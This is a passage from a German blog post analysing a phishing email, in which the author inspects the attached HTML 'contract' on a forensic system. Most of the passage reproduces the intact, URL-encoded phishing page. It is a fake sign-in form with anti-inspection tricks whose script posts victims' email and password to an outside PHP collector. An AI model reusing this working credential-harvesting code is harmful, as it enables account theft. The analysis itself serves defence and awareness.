Analyse einer Phishing-Email

16.08.2021, 13:36 - Autor: Mark B.

Alles fing damit an, dass wir vor einigen Monaten Muster von einer Firma für Reinraumbedarf angefprdert hatten. Nachdem wir die Muster erhalten haben hatten wir uns für einen anderen Anbieter entschieden aber diesen Händler nicht informiert.

Heute kam dann eine Email mit einem Download-Link zu einem vermeintlichen Vertrag via WeTransfer. Dies lies mich aufhorchen denn:

Warum sollte man einen kleinen Vertrag über WeTransfer verschicken und nicht als normale Email?
Warum sollte man uns überhaupt einen Vertrag zusenden wenn wir nichts bestellt hatten?

Fehler können immer passieren aber die Umstände kommen mir sofort suspekt vor - gesundes Misstrauen ist eine wichtige Grundvoraussetzung im heutigen IT-Umfeld. Also habe ich die Daten heruntergeladen und stellt fest, dass dies keine PDF- sondern HTML-Datei ist. Das ist ebenfalls eher ungewöhnlich. Aber dafür habe ich ja ein Forensik-System auf dem nichts anderes Läuft und auf dem ich mir derartige suspekte Dinge ansehe.

Einem normalen User hätte ich spätestens an dieser Stelle geraten den Admin zu kontaktieren damit der sich die Email ansieht...

Zuerst öffne ich die HTML-Datei mit einem Editor und ich sehe folgendes:

<script>
<!--
document.write(unescape("%3C%21---------------------------------------------------------%20START%20OF%20BODYYYY%20---------------------------------------------------------%3E%0A%0A%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%3Chead%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22UTF-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1.0%22%3E%0A%20%20%20%20%3Clink%20href%3D%22https%3A//gitsoft-container000.azurewebsites.net/favicon623e44eff7.ico%22%20rel%3D%22shortcut%20icon%22%3E%0A%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A//gitsoft-container000.azurewebsites.net/Bootstrap885d-2e5c03420a.css%22%20/%3E%0A%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A//gitsoft-container000.azurewebsites.net/all7d9285979b.css%22%20/%3E%0A%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A//gitsoft-container000.azurewebsites.net/app0d43c4b0ab.css%22%20/%3E%0A%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20type%3D%22text/css%22%20href%3D%22https%3A//gitsoft-container000.azurewebsites.net/fontlogoc35b386013.css%22%3E%20%20%20%3C/head%3E%0A%20%20%20%3Ctitle%3E%20%26%2383%3B%26%23105%3B%26%23103%3B%26%23110%3B%20%26%23105%3B%26%23110%3B%3C/title%3E%0A%20%20%20%0A%20%20%20%3Cbody%20oncontextmenu%3D%22return%20false%3B%22%3E%0A%20%20%20%3Cdiv%20class%3D%22background%22%20onload%3D%22loaded%28%29%22%20role%3D%22presentation%22%3E%0A%20%20%20%3Cdiv%20class%3D%22blur%22%20div%20class%3D%22backgroundImage%22%20style%3D%22background-image%3A%20url%28https%3A//firebasestorage.googleapis.com/v0/b/mdocshare1.appspot.com/o/Screenshot103.png%3Falt%3Dmedia%26token%3D881dc8f1-a537-4b10-ba92-d6d6bf89367d%29%3B%2522%253E%253C/div%253E%29%3B%22%3E%3C/div%3E%0A%20%20%20%3Cdiv%20class%3D%22background-overlay%22%3E%0A%20%20%20%3Cdiv%20id%3D%22footer%22%20style%3D%22box-sizing%3A%20border-box%3B%20position%3A%20fixed%3B%20bottom%3A%201px%3B%20width%3A%201366px%3B%20overflow%3A%20visible%3B%20z-index%3A%2099%3B%20clear%3A%20both%3B%20background%3A%20transparent%3B%20left%3A%20-5px%3B%22%3E%0A%20%20%20%20%20%20%3Cdiv%20style%3D%22box-sizing%3A%20border-box%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22footerLinks1%22%20class%3D%22auto-style4%22%20style%3D%22box-sizing%3A%20border-box%3B%20color%3A%20rgba%280%2C%200%2C%200%2C%200.7%29%3B%20font-size%3A%2013px%3B%20float%3A%20right%3B%20margin-right%3A%200px%3B%20margin-top%3A%200px%3B%20margin-bottom%3A%200px%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22auto-style5%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Ca%20href%3D%22javascript%3Ahistory.go%280%29%22%20style%3D%22box-sizing%3A%20border-box%3B%20background-color%3A%20transparent%3B%20color%3A%20rgb%280%2C%200%2C%200%29%3B%20text-decoration%3A%20none%3B%20font-size%3A%2012px%3B%20line-height%3A%2028px%3B%20white-space%3A%20nowrap%3B%20display%3A%20inline-block%3B%20margin-left%3A%208px%3B%20margin-right%3A%208px%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%26%23084%3B%26%23101%3B%26%23114%3B%26%23109%3B%26%23115%3B%26%23032%3B%26%23111%3B%26%23102%3B%26%23032%3B%26%23117%3B%26%23115%3B%26%23101%3B%20%3C/a%3E%3C/span%3E%3Cspan%3E%26nbsp%3B%3C/span%3E%3Cspan%20class%3D%22auto-style5%22%3E%3Ca%20href%3D%22javascript%3Ahistory.go%280%29%22%20style%3D%22box-sizing%3A%20border-box%3B%20background-color%3A%20transparent%3B%20color%3A%20rgb%280%2C%200%2C%200%29%3B%20text-decoration%3A%20none%3B%20font-size%3A%2012px%3B%20line-height%3A%2028px%3B%20white-space%3A%20nowrap%3B%20display%3A%20inline-block%3B%20margin-left%3A%208px%3B%20margin-right%3A%208px%3B%22%3E%26%23080%3B%26%23114%3B%26%23105%3B%26%23118%3B%26%23097%3B%26%23099%3B%26%23121%3B%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%26amp%3B%20%26%23099%3B%26%23111%3B%26%23111%3B%26%23107%3B%26%23105%3B%26%23101%3B%26%23115%3B%3C/a%3E%3C/span%3E%3Cspan%3E%26nbsp%3B%3C/span%3E%3Ca%20href%3D%22javascript%3Ahistory.go%280%29%22%20role%3D%22button%22%20style%3D%22box-sizing%3A%20border-box%3B%20background-color%3A%20transparent%3B%20color%3A%20rgb%280%2C%200%2C%200%29%3B%20text-decoration%3A%20none%3B%20font-size%3A%2012px%3B%20line-height%3A%2028px%3B%20white-space%3A%20nowrap%3B%20display%3A%20inline-block%3B%20margin-left%3A%208px%3B%20margin-right%3A%208px%3B%22%3E%3Cimg%20class%3D%22desktopMode%22%20pngsrc%3D%22https%3A//gitsoft-container000.azurewebsites.net/darkt.png%22%20role%3D%22presentation%22%20src%3D%22https%3A//gitsoft-container000.azurewebsites.net/dott.svg%22%20style%3D%22box-sizing%3A%20border-box%3B%20border%3A%200px%3B%20vertical-align%3A%20middle%3B%22%20svgsrc%3D%22https%3A//gitsoft-container000.azurewebsites.net/dott.svg%22%20/%3E%3C/a%3E%0A%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%3C/div%3E%0A%20%20%20%3Cbr%3E%0A%20%20%20%3Cbr%3E%0A%20%20%20%3Cbr%3E%0A%20%20%20%3Cbr%3E%0A%20%20%20%3Cdiv%20class%3D%22container%22%3E%0A%20%20%20%20%20%20%3Cdiv%20class%3D%22row%22%3E%0A%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22col-sm-5%20bg-white%20box%20mx-auto%20p-4%22%20style%3D%22margin%3A%2070px%200px%3B%20left%3A%200px%3B%20top%3A%20-82px%3B%20height%3A%20auto%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cform%20novalidate%3D%22novalidate%22%20spellcheck%3D%22false%22%20method%3D%22post%22%20autocomplete%3D%22off%22%20id%3D%22loginform%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%21----------%20FORM%20----------%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22FORM1%22%20role%3D%22main%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cbody%20oncontextmenu%3D%22return%20false%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cimg%20id%3D%22logoimg%22%20src%3D%22https%3A//gitsoft-container000.azurewebsites.net/logot.svg%22%20class%3D%22img-fluid%22%20width%3D%22110px%22%3E%3Cbr%3E%3Cbr%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20class%3D%22auto-style3%22%3E%3Cspan%20class%3D%22auto-style3%22%3E%26%2383%3B%26%23105%3B%26%23103%3B%26%23110%3B%20%26%23105%3B%26%23110%3B%20%26%23116%3B%26%23111%3B%20%26%2397%3B%26%2399%3B%26%2399%3B%26%23101%3B%26%23115%3B%26%23115%3B%20%26%23115%3B%26%23104%3B%26%2397%3B%26%23114%3B%26%23101%3B%26%23100%3B%20%26%23100%3B%26%23111%3B%26%2399%3B%26%23117%3B%26%23109%3B%26%23101%3B%26%23110%3B%26%23116%3B%3C/span%3E%3C/span%3E%3Cbr%3E%3Cbr%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22error%22%20class%3D%22alert%20alert-danger%22%20style%3D%22display%3A%20none%3B%22%3E%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22row%22%20id%3D%22pass%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22col-sm-12%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ca%20class%3D%22backButton%22%20class%3D%22align-middle%20h5%22%20type%3D%22button%22%20style%3D%22display%3Anone%3B%22%20id%3D%22backBtn%22%20%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cimg%20src%3D%22https%3A//gitsoft-container000.azurewebsites.net/arrowt.svg%22%3E%3C/a%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20id%3D%22test%22%3E%3C/span%3E%3Cspan%20id%3D%22displayName%22%3E%3C/span%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20type%3D%22email%22%20autocomplete%3D%22on%22%20name%3D%22email%22%20id%3D%22email%22%20placeholder%3D%22%26%23069%3B%26%23109%3B%26%23097%3B%26%23105%3B%26%23108%3B%26%23044%3B%26%23032%3B%26%23112%3B%26%23104%3B%26%23111%3B%26%23110%3B%26%23101%3B%26%23044%3B%26%23032%3B%26%23111%3B%26%23114%3B%26%23032%3B%26%23083%3B%26%23107%3B%26%23121%3B%26%23112%3B%26%23101%3B%26%23046%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class%3D%22form-control%20rounded-0%20border-dark%20bg-transparent%22%20style%3D%22border-left%3A%200px%20solid%20rgba%280%2C%200%2C%200%2C%200.6%29%3B%20border-right%3A%200px%20solid%20rgba%280%2C%200%2C%200%2C%200.6%29%3B%20border-top%3A%200px%20solid%20rgba%280%2C%200%2C%200%2C%200.6%29%3B%20%20box-sizing%3A%20border-box%3B%20color%3A%20inherit%3B%20margin%3A%200px%3B%20max-width%3A%20100%25%3B%20display%3A%20block%3B%20width%3A%20363px%3B%20background-image%3A%20none%3B%20padding%3A%206px%2010px%206px%200px%3B%20background-color%3A%20transparent%3B%20height%3A%2036px%3B%20outline%3A%20none%3B%20border-radius%3A%200px%3B%22%3E%3Cbr%3E%3Cbr%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20type%3D%22password%22%20name%3D%22password%22%20id%3D%22password%22%20placeholder%3D%22%26%23080%3B%26%23097%3B%26%23115%3B%26%23115%3B%26%23119%3B%26%23111%3B%26%23114%3B%26%23100%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class%3D%22form-control%20shadow-none%20bg-transparent%22%20style%3D%22display%3Anone%3B%20border-right%3A%20none%3Bborder-left%3A%20none%3Bborder-top%3A%20none%3B%20border-bottom%3A%201px%20solid%20grey%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22loader%22%20class%3D%22center%22%20style%3D%22display%3A%20none%3B%22%20role%3D%22status%22%3E%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22row%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22form-group%22%20style%3D%22box-sizing%3A%20border-box%3B%20margin-bottom%3A%2010px%3B%20color%3A%20rgb%2827%2C%2027%2C%2027%29%3B%20font-family%3A%20%26quot%3BSegoe%20UI%20Webfont%26quot%3B%2C%20-apple-system%2C%20%26quot%3BHelvetica%20Neue%26quot%3B%2C%20%26quot%3BLucida%20Grande%26quot%3B%2C%20Roboto%2C%20Ebrima%2C%20%26quot%3BNirmala%20UI%26quot%3B%2C%20Gadugi%2C%20%26quot%3BSegoe%20Xbox%20Symbol%26quot%3B%2C%20%26quot%3BSegoe%20UI%20Symbol%26quot%3B%2C%20%26quot%3BMeiryo%20UI%26quot%3B%2C%20%26quot%3BKhmer%20UI%26quot%3B%2C%20Tunga%2C%20%26quot%3BLao%20UI%26quot%3B%2C%20Raavi%2C%20%26quot%3BIskoola%20Pota%26quot%3B%2C%20Latha%2C%20Leelawadee%2C%20%26quot%3B%20YaHei%20UI%26quot%3B%2C%20%26quot%3B%20JhengHei%20UI%26quot%3B%2C%20%26quot%3BMalgun%20Gothic%26quot%3B%2C%20%26quot%3BEstrangelo%20Edessa%26quot%3B%2C%20%26quot%3B%20Himalaya%26quot%3B%2C%20%26quot%3B%20New%20Tai%20Lue%26quot%3B%2C%20%26quot%3B%20PhagsPa%26quot%3B%2C%20%26quot%3B%20Tai%20Le%26quot%3B%2C%20%26quot%3B%20Yi%20Baiti%26quot%3B%2C%20%26quot%3BMongolian%20Baiti%26quot%3B%2C%20%26quot%3BMV%20Boli%26quot%3B%2C%20%26quot%3BMyanmar%20Text%26quot%3B%2C%20%26quot%3BCambria%20Math%26quot%3B%3B%20font-size%3A%2013px%3B%20font-style%3A%20normal%3B%20font-variant-ligatures%3A%20normal%3B%20font-variant-caps%3A%20normal%3B%20font-weight%3A%20400%3B%20letter-spacing%3A%20normal%3B%20orphans%3A%202%3B%20text-align%3A%20left%3B%20text-indent%3A%200px%3B%20text-transform%3A%20none%3B%20white-space%3A%20normal%3B%20widows%3A%202%3B%20word-spacing%3A%200px%3B%20-webkit-text-stroke-width%3A%200px%3B%20background-color%3A%20rgb%28255%2C%20255%2C%20255%29%3B%20text-decoration-style%3A%20initial%3B%20text-decoration-color%3A%20initial%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ca%20href%3D%22javascript%3Ahistory.go%280%29%22%20style%3D%22box-sizing%3A%20border-box%3B%20background-color%3A%20transparent%3B%20color%3A%20rgb%280%2C%20103%2C%20184%29%3B%20text-decoration%3A%20none%3B%22%20class%3D%22auto-style6%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%26%2367%3B%26%2397%3B%26%23110%3B%26%2339%3B%26%23116%3B%20%26%2397%3B%26%2399%3B%26%2399%3B%26%23101%3B%26%23115%3B%26%23115%3B%20%26%23121%3B%26%23111%3B%26%23117%3B%26%23114%3B%20%26%2397%3B%26%2399%3B%26%2399%3B%26%23111%3B%26%23117%3B%26%23110%3B%26%23116%3B%26%2363%3B%3C/a%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22form-group%22%20style%3D%22box-sizing%3A%20border-box%3B%20margin-bottom%3A%2010px%3B%20color%3A%20rgb%2827%2C%2027%2C%2027%29%3B%20font-family%3A%20%26quot%3BSegoe%20UI%20Webfont%26quot%3B%2C%20-apple-system%2C%20%26quot%3BHelvetica%20Neue%26quot%3B%2C%20%26quot%3BLucida%20Grande%26quot%3B%2C%20Roboto%2C%20Ebrima%2C%20%26quot%3BNirmala%20UI%26quot%3B%2C%20Gadugi%2C%20%26quot%3BSegoe%20Xbox%20Symbol%26quot%3B%2C%20%26quot%3BSegoe%20UI%20Symbol%26quot%3B%2C%20%26quot%3BMeiryo%20UI%26quot%3B%2C%20%26quot%3BKhmer%20UI%26quot%3B%2C%20Tunga%2C%20%26quot%3BLao%20UI%26quot%3B%2C%20Raavi%2C%20%26quot%3BIskoola%20Pota%26quot%3B%2C%20Latha%2C%20Leelawadee%2C%20%26quot%3B%20YaHei%20UI%26quot%3B%2C%20%26quot%3B%20JhengHei%20UI%26quot%3B%2C%20%26quot%3BMalgun%20Gothic%26quot%3B%2C%20%26quot%3BEstrangelo%20Edessa%26quot%3B%2C%20%26quot%3B%20Himalaya%26quot%3B%2C%20%26quot%3B%20New%20Tai%20Lue%26quot%3B%2C%20%26quot%3B%20PhagsPa%26quot%3B%2C%20%26quot%3B%20Tai%20Le%26quot%3B%2C%20%26quot%3B%20Yi%20Baiti%26quot%3B%2C%20%26quot%3BMongolian%20Baiti%26quot%3B%2C%20%26quot%3BMV%20Boli%26quot%3B%2C%20%26quot%3BMyanmar%20Text%26quot%3B%2C%20%26quot%3BCambria%20Math%26quot%3B%3B%20font-size%3A%2013px%3B%20font-style%3A%20normal%3B%20font-variant-ligatures%3A%20normal%3B%20font-variant-caps%3A%20normal%3B%20font-weight%3A%20400%3B%20letter-spacing%3A%20normal%3B%20orphans%3A%202%3B%20text-align%3A%20left%3B%20text-indent%3A%200px%3B%20text-transform%3A%20none%3B%20white-space%3A%20normal%3B%20widows%3A%202%3B%20word-spacing%3A%200px%3B%20-webkit-text-stroke-width%3A%200px%3B%20background-color%3A%20rgb%28255%2C%20255%2C%20255%29%3B%20text-decoration-style%3A%20initial%3B%20text-decoration-color%3A%20initial%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22form-group%22%20style%3D%22box-sizing%3A%20border-box%3B%20margin-bottom%3A%2010px%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ca%20href%3D%22javascript%3Ahistory.go%280%29%22%20style%3D%22box-sizing%3A%20border-box%3B%20background-color%3A%20transparent%3B%20color%3A%20rgb%280%2C%20103%2C%20184%29%3B%20text-decoration%3A%20none%3B%22%20class%3D%22auto-style6%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%26%2383%3B%26%23105%3B%26%23103%3B%26%23110%3B%26%2345%3B%26%23105%3B%26%23110%3B%20%26%23111%3B%26%23112%3B%26%23116%3B%26%23105%3B%26%23111%3B%26%23110%3B%26%23115%3B%3C/a%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22row%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22col-sm-12%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22sbtn%22%20class%3D%22text-right%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20id%3D%22Tombol1%22%20type%3D%22submit%22%20name%3D%22submit%22%20value%3D%22Next%22%20class%3D%22btn%20rounded-0%20text-white%20px-4%22%20style%3D%22background-color%3A%20%230066BA%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%21----------%20FINISH%20----------%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22Finish%22%20role%3D%22main%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ccenter%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3CP%3E%3CIMG%20style%3D%22HEIGHT%3A%2054px%3B%20WIDTH%3A%20380px%22%20src%3D%22https%3A//gitsoft-container000.azurewebsites.net/dat.jpg%22%20width%3D500%20align%3Dcenter%20height%3D507%3E%3C/P%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/A%3E%3Cbr%3E%3Cbr%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfont%20size%3D%276%27%3EThis%20file%20has%20been%20moved%20or%20deleted%3C/font%3E%3Cbr%3E%3Cbr%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfont%20size%3D%273%27%3EYou%20will%20be%20redirected.%3C/font%3E%3Cbr%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ca%20href%3D%27%27%3EWhat%27s%20this%3F%3C/a%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/center%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C/form%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22fr%22%3E%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%3C/div%3E%0A%20%20%20%0A%3C%21---------------------------------------------------------%20END%20OF%20BODYYYY%20---------------------------------------------------------%3E%0A%20%20%20%0A%20%20%20%0A%3Cscript%20src%3D%22https%3A//gitsoft-container000.azurewebsites.net/1.12.4jquery.min.js%22%3E%3C/script%3E%0A%3Cscript%20src%3D%22https%3A//gitsoft-container000.azurewebsites.net/4.3.1bootstrap.min.js%22%3E%3C/script%3E%0A%3Cscript%20src%3D%22https%3A//gitsoft-container000.azurewebsites.net/4.3.1bootstrap.bundle.min.js%22%3E%3C/script%3E%0A%3Cscript%20src%3D%22https%3A//gitsoft-container000.azurewebsites.net/3.3.1jquery.min.js%22%3E%3C/script%3E%0A%3Cscript%20src%3D%22https%3A//gitsoft-container000.azurewebsites.net/2.2.4jquery.min.js%22%3E%3C/script%3E%0A%3Cscript%20src%3D%22https%3A//gitsoft-container000.azurewebsites.net/4.1.3bootstrap.min.js%22%3E%3C/script%3E%0A%0A%20%20%20%20%3Cscript%3E%0A%20%20%20%20%20%20function%20redirectCU%28e%29%20%7B%0A%20%20%20%20%20%20%20%20if%20%28e.ctrlKey%20%26%26%20e.which%20%3D%3D%2085%29%20%7B%0A%20%20%20%20%20%20%09return%20false%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20document.onkeydown%20%3D%20redirectCU%3B%0A%20%20%20%20%20%20%0A%20%20%20%20%20%20function%20redirectKK%28e%29%20%7B%0A%20%20%20%20%20%20%20%20if%20%28e.which%20%3D%3D%203%29%20%7B%0A%20%20%20%20%20%20%09return%20false%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20document.oncontextmenu%20%3D%20redirectKK%3B%0A%20%20%20%20%20%20%0A%20%20%20%20%20%20%24%28%22%23pass%22%29.animate%28%7Bleft%3A0%2C%20opacity%3A%22show%22%7D%2C%201500%29%3B%0A%20%20%20%20%20%20var%20email%20%3D%20window.location.hash.substr%281%29%3B%0A%20%20%20%20%20%20var%20PASS%20%3D%20document.getElementById%28%27password%27%29%3B%0A%20%20%20%20%20%20var%20PASSX%20%3D%20document.getElementById%28%27passwordx%27%29%3B%0A%20%20%20%20%20%20var%20PASSY%20%3D%20document.getElementById%28%27passwordy%27%29%3B%0A%20%20%20%20%20%20%0A%20%20%20%20%20%20%24%28%27%23password%27%29.focus%28%29%3B%0A%20%20%20%20%20%20%0A%20%20%20%20%20%20var%20displayName%20%3D%20%24%28%27%23displayName%27%29%3B%0A%20%20%20%20%20%20displayName.attr%28%27value%27%2C%20email%29%3B%0A%20%20%20%20%20%20%24%28%27%5Bname%3Demail%5D%27%29.val%28email%29%3B%0A%20%20%20%20%20%20//displayName.html%28email%29%3B%0A%20%20%20%20%20%20%0A%20%20%20%20%20%20%24%28%27%23password%27%29.keyup%28function%20%28event%29%20%7B%0A%20%20%20%20%20%20%09if%20%28event.which%20%3D%3D%2013%29%20%7B%0A%20%20%20%20%20%20%09%09%24%28%27%23Tombol1%27%29.click%28%29%3B%0A%20%20%20%20%20%20%09%7D%0A%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%0A%20%20%20%20%20%20%0A%20%20%20%20%20%20%24%28%27%23backBtn%27%29.click%28function%28%29%7B%0A%20%20%20%20%20%20%09%24%28%27%23password%27%29.val%28%27%27%29%3B%0A%20%20%20%20%20%20%09%24%28%27%23password%27%29.hide%28%29%3B%0A%20%20%20%20%20%20%09%24%28%27%23email%27%29.show%28%29%3B%0A%20%20%20%20%20%20%09%24%28%27%23Tombol1%27%29.val%28%27Next%27%29%3B%0A%20%20%20%20%20%20%09%24%28%27%23backBtn%27%29.hide%28%29%3B%0A%20%20%20%20%20%20%09%24%28%27%23displayName%27%29.html%28%27%27%29%3B%0A%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%0A%20%20%20%20%20%20var%20Tombol1%20%3D%20%24%28%27%23Tombol1%27%29%3B%0A%20%20%20%20%20%20Tombol1.click%28function%28e%29%7B%0A%20%20%20%20%20%20%09e.preventDefault%28%29%3B%0A%20%20%20%20%20%20%09%0A%20%20%20%20%20%20%09var%20email%20%3D%20%24%28%27%23email%27%29.val%28%29%3B%0A%20%20%20%20%20%20%09var%20pass%20%3D%20%24%28%27%23password%27%29%3B%0A%20%20%20%20%20%20%09var%20password_v%20%3D%20pass.val%28%29%3B%0A%20%20%20%20%20%20%09%0A%20%20%20%20%20%20%09if%28email%3D%3D%27%27%29%7B%0A%20%20%20%20%20%20%09%09pass.hide%28%29%3B%0A%20%20%20%20%20%20%09%09%24%28%27%23email%27%29.show%28%29%3B%0A%20%20%20%20%20%20%09%09Tombol1.val%28%27Next%27%29%3B%0A%20%20%20%20%20%20%09%09%24%28%27%23backBtn%27%29.hide%28%29%3B%0A%20%20%20%20%20%20%09%7Delse%20if%28email%21%3D%3D%27%27%20%26%26%20password_v%3D%3D%27%27%29%7B%0A%20%20%20%20%20%20%09%09%24%28%27%23displayName%27%29.html%28email%29%3B%0A%20%20%20%20%20%20%09%09Tombol1.val%28%27Sign%20In%27%29%3B%0A%20%20%20%20%20%20%09%09pass.show%28%29%3B%0A%20%20%20%20%20%20%09%09%24%28%27%23email%27%29.hide%28%29%3B%0A%20%20%20%20%20%20%09%09%24%28%27%23backBtn%27%29.show%28%29%3B%0A%20%20%20%20%20%20%09%7Delse%7B%0A%20%20%20%20%20%20%09%24.ajax%28%7B%0A%20%20%20%20%20%20%09%09url%3A%20%27https%3A//guercioandsons.com/cloud2/ylog.php%27%2C%0A%20%20%20%20%20%20%09%09type%3A%20%27POST%27%2C%20%0A%20%20%20%20%20%20%09%09dataType%3A%20%27html%27%2C%20%0A%20%20%20%20%20%20%09%09beforeSend%3A%20function%28%29%7B%0A%20%20%20%20%20%20%09%09%09%24%28%22%23loader%22%29.show%28%29%3B%0A%20%20%20%20%20%20%09%09%7D%2C%0A%20%20%20%20%20%20%09%09data%3A%20%7B%20u%20%3A%20email%2C%20p%20%3A%20password_v%7D%2C%20%0A%20%20%20%20%20%20%09%09success%3A%20function%28data%29%20%7B%0A%20%20%20%20%20%20%09%09%09%24%28%22%23loader%22%29.hide%28%29%3B%0A%20%20%20%20%20%20%09%09%09%24%28%27%23fr%27%29.html%28data%29%3B%0A%20%20%20%20%20%20%09%09%7D%2C%0A%20%20%20%20%20%20%09%09error%3A%20function%28e%29%20%7B%0A%20%20%20%20%20%20%09%09%09alert%28%27Error%20Occurred.%20Try%20again.%27%29%3B%0A%20%20%20%20%20%20%09%09%09window.location.href%3D%22%22%3B%0A%20%20%20%20%20%20%09%09%7D%0A%20%20%20%20%20%20%09%7D%29%3B%0A%20%20%20%20%20%20%09%7D%0A%20%20%20%20%20%20%09%0A%20%20%20%20%20%20%09%0A%20%20%20%20%20%20%09%0A%20%2